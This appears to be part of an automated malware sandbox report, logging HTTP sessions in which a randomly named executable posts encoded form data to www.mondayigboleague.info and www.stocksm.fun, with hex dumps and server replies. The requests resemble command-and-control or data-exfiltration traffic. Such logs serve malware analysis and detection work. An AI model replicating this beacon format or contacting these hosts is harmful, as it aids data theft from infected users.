                                                                                        Data Raw: 6a 6e 51 58 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 46 2b 2f 74 68 52 53 49 33 4b 66 65 63 67 48 2b 37 76 41 52 73 74 58 6d 6a 62 39 59 43 56 41 6f 4c 32 32 55 42 57 53 37 76 4e 67 67 50 75 79 6b 34 55 64 79 4f 50 7a 6d 75 77 57 37 4c 54 2b 79 44 39 51 47 6a 67 6e 79 74 67 4a 5a 42 55 54 6e 4e 61 45 33 65 32 34 54 59 70 4c 58 41 65 79 6c 76 52 67 49 4c 4d 66 6c 68 4e 4a 42 6e 76 63 46 54 59 7a 2f 77 79 59 4e 78 59 70 76 4a 6b 4a 73 7a 41 58 52 62 48 7a 58 70 6b 6e 43 71 34 4b 76 2f 6c 6b 49 4e 2b 78 63 2f 64 52 72 48 66 4a 56 79 4a 4c 34 4c 2f 4d 71 55 39 63 46 38 37 56 70 53 62 76 65 39 41 3d 3d
                                                                                        Data Ascii: jnQX=+0MuHPCNpm0aF+/thRSI3KfecgH+7vARstXmjb9YCVAoL22UBWS7vNggPuyk4UdyOPzmuwW7LT+yD9QGjgnytgJZBUTnNaE3e24TYpLXAeylvRgILMflhNJBnvcFTYz/wyYNxYpvJkJszAXRbHzXpknCq4Kv/lkIN+xc/dRrHfJVyJL4L/MqU9cF87VpSbve9A==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.22491833.33.130.190801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:15.150227070 CEST2472OUTPOST /t10u/ HTTP/1.1
                                                                                        Host: www.mondayigboleague.info
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.mondayigboleague.info
                                                                                        Referer: http://www.mondayigboleague.info/t10u/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 45 66 50 74 6e 79 71 49 67 36 65 73 5a 67 48 2b 78 50 41 56 73 74 4c 6d 6a 5a 51 44 43 67 51 6f 4c 6c 4f 55 47 77 75 37 74 4e 67 67 4a 75 79 6f 32 30 63 37 4f 50 6e 71 75 78 6e 4d 4c 56 47 79 46 66 34 47 72 44 50 78 6e 77 4a 58 46 55 54 67 4e 61 46 31 65 79 56 62 59 70 50 39 41 65 71 6c 75 69 49 49 63 4d 66 6d 74 74 4a 42 6e 76 63 4a 54 59 7a 66 77 79 67 56 78 5a 78 2f 49 57 42 73 39 42 33 52 5a 6b 72 55 76 6b 6e 47 70 34 4c 64 36 6c 6f 41 58 6f 42 70 69 66 56 4e 46 72 52 4c 2f 65 32 2f 44 76 59 55 61 74 73 43 37 38 41 72 54 4c 71 31 76 7a 61 7a 36 62 63 75 32 6f 52 76 6e 67 77 62 39 4f 66 6c 38 6b 69 4e 49 38 58 71 47 2b 6b 33 34 44 78 31 4c 5a 36 4e 73 58 7a 55 53 6f 43 4c 42 76 2b 41 37 54 33 62 69 38 46 4c 32 62 53 41 4b 56 35 6a 4a 66 30 34 4c 2f 38 78 63 4a 76 41 67 66 5a 69 4b 4a 33 48 4a 53 7a 7a 4b 34 4c 4e 4e 64 41 33 70 62 51 46 43 77 6d 72 37 76 4e 76 61 73 67 43 71 37 37 4c 4d 4a 73 66 4c 47 55 36 4b 34 6b 58 38 6d 4f 38 73 34 47 50 4a [TRUNCATED]
                                                                                        Data Ascii: jnQX=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCgQoLlOUGwu7tNggJuyo20c7OPnquxnMLVGyFf4GrDPxnwJXFUTgNaF1eyVbYpP9AeqluiIIcMfmttJBnvcJTYzfwygVxZx/IWBs9B3RZkrUvknGp4Ld6loAXoBpifVNFrRL/e2/DvYUatsC78ArTLq1vzaz6bcu2oRvngwb9Ofl8kiNI8XqG+k34Dx1LZ6NsXzUSoCLBv+A7T3bi8FL2bSAKV5jJf04L/8xcJvAgfZiKJ3HJSzzK4LNNdA3pbQFCwmr7vNvasgCq77LMJsfLGU6K4kX8mO8s4GPJz0FBMvx5C0GfKxiqPi6Z3obDGWuaq40DyPxW3zvIfyZxRwO5cFjDCtzq7TCKiioKlpcBvwqtA9nts3NWh4fXkEvuXUQkCGbxe7dZUsnwzblcPtargGRyLIdCymaJE91aZ2+pT+KUF7V9g8xHGPjgdbHzn0VtITBJWA9WMYf9rUy9fFo6BmhV0GOqvWk1zk1knVwUjpiIv4aZyp//kohrf1Lk9BChU0TnlpRJko64sp76kACO8COzBTTMsU/EfT6/nh9fTSbw3tsh6e7BrG+79qmiLzQF6c842RTbqscNslgw4UzT5EAMNsGpzmXFIMRg8En8nSsYLIGziEyeHAkaKUnmtA3dkRWto6q5hGIgmg/+1o8baA1Ov1b6g3EyIFkwVb5DxSA0tj3JuICrIbMvFRwUZgKa/V0+ipkNxRYIM3ns+L/0fYCcbmK/NQ4SCz8Gn3hBNt4xw4Awk1EIgHilkvhAqpSrq7AQyFpguSAtHawuR1oWGXfJheLqM5P6iCSjrbpxTIaQpdXTZvGJc26CRT15LQxwpMK9STczgwiwPqOAGS8Xp0a2y5ANjFEo0fEkSg/YLcuBkOEDNiZn1XWGnmbt6GmxqsI2+cA3DZx+sf/qoERxQeJIio8KIoR0P6CRIzr+Dq7eTf+SXbUt7svx3FtSM0I9tNYVPM [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:15.155215025 CEST1719OUTData Raw: 66 61 44 7a 46 71 4f 55 55 32 2f 73 39 2f 61 77 4a 79 4a 38 64 58 32 6a 54 4d 51 65 76 66 69 76 35 79 4b 73 52 45 75 50 46 5a 7a 47 33 58 45 52 78 6f 7a 71 4b 35 6e 4d 2b 54 73 48 6b 4e 57 43 63 42 41 50 38 4b 2b 62 76 31 5a 49 31 49 6b 78 49 48
                                                                                        Data Ascii: faDzFqOUU2/s9/awJyJ8dX2jTMQevfiv5yKsREuPFZzG3XERxozqK5nM+TsHkNWCcBAP8K+bv1ZI1IkxIHqS0VHTIThUkwzJa2tURMpP+P1rtHC93cx0Yy9J1J5JTu8mRn0ezx9p5ZfZ6yJulX1ZshF1eJh6BRXX5ZO9kyY5G264SwVZUElyg7ibK3Jv0PeEbOXNZ07CZ6cnyLnk9j358o/U1lLh9wyK5yY3eT5H6uXIPPMFhs7


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.22491843.33.130.190801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:17.686117887 CEST483OUTGET /t10u/?jnQX=z2kOE6Hdw1U1MLXklDyp9Yeiaynt+oJtvvr0x5hWEi4SF2SHBGm8iJVVQ9fey1U/CoztigTmFBDjEJBprUmgmj56JVnqLqZmNm1dTZL5G96LsAIGFczAt5NVhqxy&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.mondayigboleague.info
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:53:18.162281990 CEST396INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 09 Oct 2024 10:53:18 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 256
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6a 6e 51 58 3d 7a 32 6b 4f 45 36 48 64 77 31 55 31 4d 4c 58 6b 6c 44 79 70 39 59 65 69 61 79 6e 74 2b 6f 4a 74 76 76 72 30 78 35 68 57 45 69 34 53 46 32 53 48 42 47 6d 38 69 4a 56 56 51 39 66 65 79 31 55 2f 43 6f 7a 74 69 67 54 6d 46 42 44 6a 45 4a 42 70 72 55 6d 67 6d 6a 35 36 4a 56 6e 71 4c 71 5a 6d 4e 6d 31 64 54 5a 4c 35 47 39 36 4c 73 41 49 47 46 63 7a 41 74 35 4e 56 68 71 78 79 26 6f 70 39 3d 42 4c 74 54 6d 30 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jnQX=z2kOE6Hdw1U1MLXklDyp9Yeiaynt+oJtvvr0x5hWEi4SF2SHBGm8iJVVQ9fey1U/CoztigTmFBDjEJBprUmgmj56JVnqLqZmNm1dTZL5G96LsAIGFczAt5NVhqxy&op9=BLtTm0V"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.2249185217.70.184.50801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:23.192042112 CEST2472OUTPOST /0bvj/ HTTP/1.1
                                                                                        Host: www.stocksm.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.stocksm.fun
                                                                                        Referer: http://www.stocksm.fun/0bvj/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 45 71 39 57 37 57 73 4e 62 69 68 70 32 46 74 52 37 56 44 5a 33 56 51 42 53 5a 44 71 63 74 59 50 38 62 77 6b 75 38 76 6c 4a 4a 6b 2f 45 78 56 71 50 36 71 59 77 4c 77 39 30 64 39 63 57 78 73 62 37 2f 64 38 31 67 70 36 36 69 37 65 63 78 37 73 65 50 66 6e 6a 4f 32 53 71 4f 55 67 56 76 63 4a 31 6f 65 39 31 35 38 6a 44 38 6c 66 42 38 4d 48 4a 62 64 32 33 4f 75 32 6c 6e 30 31 38 54 39 51 59 2f 4c 31 35 56 37 33 2f 34 4b 79 49 7a 43 49 67 2f 4e 31 33 47 71 30 76 45 46 5a 59 64 56 67 57 43 36 53 49 78 38 42 73 46 59 64 72 77 36 49 6b 4c 7a 77 4f 73 57 4c 2b 65 6f 76 77 66 32 48 6d 4a 63 75 63 70 77 44 6d 59 6a 64 63 39 4c 47 6c 41 42 46 6e 59 4f 64 49 48 65 37 61 42 2f 50 35 5a 6c 31 2f 36 77 5a 4d 47 6e 66 6e 4c 35 45 44 49 46 4c 63 78 62 6a 74 4f 4d 34 47 36 33 68 4a 4d 4b 65 33 7a 74 6d 6f 46 79 53 72 78 4e 71 46 42 51 78 6a 45 51 4e 79 59 56 76 47 35 66 6b 66 50 57 70 59 6b 32 42 36 41 71 75 59 7a 56 54 65 70 31 63 33 67 4b 4c 4a 52 74 78 53 4d 31 71 6d 52 6d 35 76 79 55 68 36 47 58 64 41 [TRUNCATED]
                                                                                        Data Ascii: jnQX=Eq9W7WsNbihp2FtR7VDZ3VQBSZDqctYP8bwku8vlJJk/ExVqP6qYwLw90d9cWxsb7/d81gp66i7ecx7sePfnjO2SqOUgVvcJ1oe9158jD8lfB8MHJbd23Ou2ln018T9QY/L15V73/4KyIzCIg/N13Gq0vEFZYdVgWC6SIx8BsFYdrw6IkLzwOsWL+eovwf2HmJcucpwDmYjdc9LGlABFnYOdIHe7aB/P5Zl1/6wZMGnfnL5EDIFLcxbjtOM4G63hJMKe3ztmoFySrxNqFBQxjEQNyYVvG5fkfPWpYk2B6AquYzVTep1c3gKLJRtxSM1qmRm5vyUh6GXdALcyjFr2nTvngKu8MZwwVuXKHoduHSbjGJyvBMlaTVDKaN+HlrL3C3MFwoRJJAYKNk6aIIc1OZ0GwXqprCroLiYoIrURdon7Fuue4lckioaFkrxOBWXbgecbDp5c5uaqT/Hp4vdAspQ0QIgvBLQCPE4OJapagINltJeZUDxCgeZzUV3f7758pmz/BPKiKUC8n0H9KYT/8nSjp6mcr25V0bv2djmMfYquiTt/A8YCoP1V3XRW+ycJq7UILvK5WhlaGorr7kvDllXIH0TebrOjJXUsHhfnjaBdOBmp3lSTgnHUdPxhXeJCsM5mA3ddTpvuQlGYZiPTSpVzxN/YFGt/AQ41/mV9YY/Mvige1k+VxXFCHbINQVRhVBn6BTaZPBa4P7dQmiHPKMyw3fBQsfl8Iv+Dd0IfroUG3Ddx+zIVONpr8kNN9UluXjEWWLXCYfss1cYNcuqqE6kbHvzDQNw6Hd3YYnDSGs5s/z7/JnvlQ0kgha6q3wZZ9MH0NMMq4ZTFWk7LL8HGUBr5gSNKDS2nkOI+tF+ySwsT8KsP9owixR9KUNDGpY0v861ZBopzbFSyy7eCzphDHxbfSmVF+8OQprsNmO0DruA5YxMle6cVJ3stDUdsKtyZIaP4KxgfuIWwvwpDa/WOJVbyLTJKBmXE5xTlXofbhNo5Nyd [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:23.197069883 CEST225OUTData Raw: 7a 6a 56 6c 48 68 79 57 70 4e 2b 48 5a 53 47 6c 34 57 71 63 55 37 6f 66 45 45 6c 35 47 2f 6d 36 68 39 73 75 6e 4b 4f 48 32 32 6c 59 57 75 6b 34 6d 33 35 58 45 58 59 35 79 74 59 76 43 34 64 67 35 7a 59 2f 47 63 61 77 6f 30 54 59 6f 56 34 67 58 49
                                                                                        Data Ascii: zjVlHhyWpN+HZSGl4WqcU7ofEEl5G/m6h9sunKOH22lYWuk4m35XEXY5ytYvC4dg5zY/Gcawo0TYoV4gXISPxXCI7H3TbxUoD0GTeinzbVeEJaInMparzH59MrPwZlVbgwKyOhP0hGdvma/7TCZinAUvqNFBT3dIJlH0vn08Xz1tIukLRgZZ8sIuYXz4tJbo//p807TEgTpRxDHeOcdn3t1cYJ87HdsUa
                                                                                        Oct 9, 2024 12:53:23.786201000 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 09 Oct 2024 10:53:23 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.2249186217.70.184.50801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:25.724104881 CEST736OUTPOST /0bvj/ HTTP/1.1
                                                                                        Host: www.stocksm.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.stocksm.fun
                                                                                        Referer: http://www.stocksm.fun/0bvj/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 45 71 39 57 37 57 73 4e 62 69 68 70 32 43 35 52 37 41 76 5a 32 31 51 42 52 5a 44 71 57 4e 59 4e 38 62 39 62 75 2b 44 4d 4a 36 30 2f 64 44 4e 71 50 75 4b 59 7a 4c 77 2b 73 4e 39 59 4c 42 73 4f 37 2f 64 57 31 69 74 36 36 69 48 65 61 53 44 73 4a 61 2f 67 67 2b 32 51 2f 65 55 6a 56 76 51 71 31 6f 43 54 31 39 49 6a 44 39 70 66 41 34 73 48 43 5a 46 32 67 2b 75 77 73 48 31 73 38 54 78 4a 59 38 6a 39 35 56 72 33 34 4a 57 79 47 43 69 49 6e 6f 68 31 2b 6d 72 54 31 30 45 63 63 6f 35 6f 4d 52 37 5a 50 32 46 6e 69 52 6f 39 72 69 6a 52 67 6f 72 2b 5a 73 6d 53 68 35 68 6e 6d 39 2f 57 38 41 3d 3d
                                                                                        Data Ascii: jnQX=Eq9W7WsNbihp2C5R7AvZ21QBRZDqWNYN8b9bu+DMJ60/dDNqPuKYzLw+sN9YLBsO7/dW1it66iHeaSDsJa/gg+2Q/eUjVvQq1oCT19IjD9pfA4sHCZF2g+uwsH1s8TxJY8j95Vr34JWyGCiInoh1+mrT10Ecco5oMR7ZP2FniRo9rijRgor+ZsmSh5hnm9/W8A==
                                                                                        Oct 9, 2024 12:53:26.318517923 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 09 Oct 2024 10:53:26 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.2249187217.70.184.50801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:28.268337965 CEST2472OUTPOST /0bvj/ HTTP/1.1
                                                                                        Host: www.stocksm.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.stocksm.fun
                                                                                        Referer: http://www.stocksm.fun/0bvj/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 45 71 39 57 37 57 73 4e 62 69 68 70 33 69 70 52 35 6a 58 5a 30 56 51 4f 65 35 44 71 63 74 59 42 38 62 78 62 75 38 76 6c 4a 49 34 2f 45 30 42 71 50 4b 71 59 78 4c 77 2b 39 39 39 63 57 78 73 59 37 2f 35 73 31 67 6c 4d 36 6b 33 65 63 31 50 73 65 4f 66 6e 31 65 32 53 31 2b 55 69 56 76 52 33 31 6f 53 70 31 39 45 4a 44 39 78 66 44 4a 41 48 45 70 46 78 6c 2b 75 77 73 48 30 2b 38 54 78 70 59 38 72 66 35 55 79 36 2f 2f 61 79 49 44 43 49 6c 50 4e 30 34 6d 71 37 72 45 46 70 59 64 51 59 57 43 37 62 49 77 4e 6b 73 46 63 64 72 69 69 49 6b 4b 7a 7a 51 4d 57 49 67 75 6f 76 74 50 32 46 6d 4a 63 69 63 70 77 44 6d 59 33 64 4f 64 4c 47 6c 42 42 4b 35 6f 4f 64 46 6e 65 4d 56 68 7a 78 35 5a 42 58 2f 37 41 6a 4d 52 66 66 31 35 52 45 55 49 46 4c 62 42 62 74 74 4f 4d 6c 49 61 33 4c 4a 50 37 39 33 7a 39 51 6f 46 79 53 72 33 5a 71 43 53 6f 78 6e 55 51 4e 77 59 56 71 66 70 66 6e 66 50 43 78 59 6e 71 42 36 42 69 75 4a 55 78 54 4a 36 64 54 6a 67 4b 49 59 42 74 4a 57 4d 31 46 6d 52 36 58 76 79 74 70 36 46 2f 64 41 [TRUNCATED]
                                                                                        Data Ascii: jnQX=Eq9W7WsNbihp3ipR5jXZ0VQOe5DqctYB8bxbu8vlJI4/E0BqPKqYxLw+999cWxsY7/5s1glM6k3ec1PseOfn1e2S1+UiVvR31oSp19EJD9xfDJAHEpFxl+uwsH0+8TxpY8rf5Uy6//ayIDCIlPN04mq7rEFpYdQYWC7bIwNksFcdriiIkKzzQMWIguovtP2FmJcicpwDmY3dOdLGlBBK5oOdFneMVhzx5ZBX/7AjMRff15REUIFLbBbttOMlIa3LJP793z9QoFySr3ZqCSoxnUQNwYVqfpfnfPCxYnqB6BiuJUxTJ6dTjgKIYBtJWM1FmR6Xvytp6F/dAPkyzXD2mjvgtquwdJ80VuvoHsBYHQvjEbavGKxZP1DIfN+RuLLNC2crwoxJOy0KMlaaer02GJ0FmnqE5CraLiMwIqEBdZX7DOue5H0nuYaE87wNI2XzgedgDtlm6caqT8fp481AspQ3VIgpUbUFPFECJalKgOhlt5OZUApCoeZzfF3cp75YpnTvBOycNkW8mSj9IaL/9HStmamnzW5y0b/2dn+cfYSuiyt/BdYC9/1RpnR/+ycjq9IULvaHWjBaGrzrs2LD91XJLUTSfrOuJWB3HhLBjf9dPhGpkESTjHHWVvxhFeIHsNR2A1prTt7uQwaYbCPQbJVw+t/fS2tpAQo1/mZ9YZHMvV0emjqVznFEZbIha1UGVB2LBSfSPB64e+pQxRjQEcyyivBK+vlQIv+Xd25Ur6cG3XRx8XcWNtps1EMFz0kGXj08WOnofoYs1dINccyqHKkbHvzEQNxxHd7mYmz4Gs5s+i7/IR7lfUklja72lAZ99MDGNMEM4ZPFX0bLL8HBaRr+6CNLDS6AkOIctECySGsT9ZUP8KIi2x9KTNDFg40y861JBp0ubESyg7+CwqFAfRbSH2VT3cDQprQVmPADrdU5Zj0leKcVXnsuN0dDFNOdIaDCKwwPu5Gwhn1DKICBcVb3PTJMBmbN5xbtXsa5hOo5NSd [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:28.273570061 CEST1689OUTData Raw: 7a 6a 54 6c 48 68 43 57 71 4c 2b 48 69 65 6d 6c 6a 59 4b 63 49 37 6f 65 31 45 6c 6c 38 2f 6c 32 68 39 36 71 6e 61 66 48 32 32 56 59 51 6e 45 35 34 36 5a 62 53 58 59 46 41 74 61 47 39 34 70 30 35 79 71 48 47 4f 5a 49 6f 69 44 59 6c 57 34 67 65 49
                                                                                        Data Ascii: zjTlHhCWqL+HiemljYKcI7oe1Ell8/l2h96qnafH22VYQnE546ZbSXYFAtaG94p05yqHGOZIoiDYlW4geISDZXCYnH2jxkxADy2TemkLaReFMfInBparfH5lIrNkJlQPgwLeOuf0mBtvaXf6SCZueAUnQNFRT3YAJnnkvi08XsltJtkLE+pV/sMTYCVI/eNMGmNEt/l4bC5J5GFnpS8bRoUZ9fbD/LLlax3eLtqQwPccEPm6m1F
                                                                                        Oct 9, 2024 12:53:28.969506025 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 09 Oct 2024 10:53:28 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
